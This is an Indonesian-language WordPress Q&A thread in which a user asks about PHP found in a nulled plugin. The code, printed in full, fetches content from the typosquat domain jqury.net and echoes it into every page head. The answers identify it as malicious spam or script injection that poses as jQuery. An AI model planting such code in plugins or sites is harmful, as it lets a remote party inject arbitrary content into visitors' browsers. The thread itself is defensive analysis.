Saya menemukan ini di sebuah plugin. Apa fungsinya? Apa ini berbahaya?

17

Saya menemukan ini di sebuah plugin. Apa fungsinya? Apa ini berbahaya?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
plugins  wp-admin  security  curl 
Sofia Rose
sumber
5
Plugin mana itu?
Daniel
Apakah Anda mendapatkan plugin dari situs WP resmi?
Cowok asal Brasil itu
1
Ini dalam plugin yang salah satu pelanggan saya ingin saya jalankan di instal jaringan saya. Plugin ingin menjalankan ini di wp-admin. Setelah membaca ini saya bertanya kepadanya dari mana asalnya. Ini adalah nulled plugin dari torrent. Jawaban singkatnya adalah erm NO xXx
Sofia Rose

Jawaban:

16

Itu memuat blok markup yang mengandung spam (saya berpikir tentang memposting sedikit sumber tetapi saya tidak ingin mengiklankan konten dengan cara apa pun) dari domain yang salah mengeja domain ---- http://jquery.com/digunakan oleh jQuery , perpustakaan Javascript yang bereputasi baik dan populer serta WordPress yang termasuk dalam Core. Saya pikir idenya adalah untuk memuat perpustakaan itu, padahal sebenarnya memuat sesuatu yang sangat berbeda.

Dan itu dengan cara lain berusaha tampak memuat jQuery. Perhatikan nama variabel $jquery.

Mungkin mencoba memuat skrip berbahaya juga. Saya tidak memeriksa. Saya pasti akan menyebutnya berbahaya terutama karena konten pada halaman itu dapat berubah kapan saja pengontrol domain merasa seperti itu.

Paling-paling itu akan merusak situs Anda karena mesin pencari memandang rendah situs yang menyebarkan spam.

Jangan gunakan itu. Tidak ada manfaatnya bagi Anda atau orang lain di web selain orang yang menjalankan situs. Jika Anda menemukan ini di situs terkemuka, laporkan ke mereka.

s_ha_dum
sumber
7

Ya, itu kode berbahaya, memuat konten dari situs spam.

Anda tidak memberi nama plugin, tetapi jika Anda menemukan kode ini setelah diinstal di situs web Anda, ada kemungkinan bahwa kode plugin tidak berasal dari pengembang seperti ini, tetapi malah diretas setelah diinstal. Jika ini masalahnya, Anda mungkin menemukan kode berbahaya di lebih dari situs web Anda daripada hanya plugin ini.

Periksa kode plugin yang diunduh dari mana pun Anda mendapatkan plugin itu semula, dan lihat apakah kode berbahaya ini ada di sana semula. Jika tidak, maka situs Anda telah diretas. Jika Anda menentukan hal itu, baca artikel ini dari Codex .

Ben Miller - Pasang kembali Monica
sumber
3
Ini dalam plugin yang salah satu pelanggan saya ingin saya jalankan di instal jaringan saya. Plugin ingin menjalankan ini di wp-admin. Setelah membaca ini saya bertanya kepadanya dari mana asalnya. Ini adalah nulled plugin dari torrent. Jawaban singkatnya adalah erm NO xXx
Sofia Rose
Dengan menggunakan situs kami, Anda mengakui telah membaca dan memahami Kebijakan Cookie dan Kebijakan Privasi kami.
Licensed under cc by-sa 3.0 with attribution required.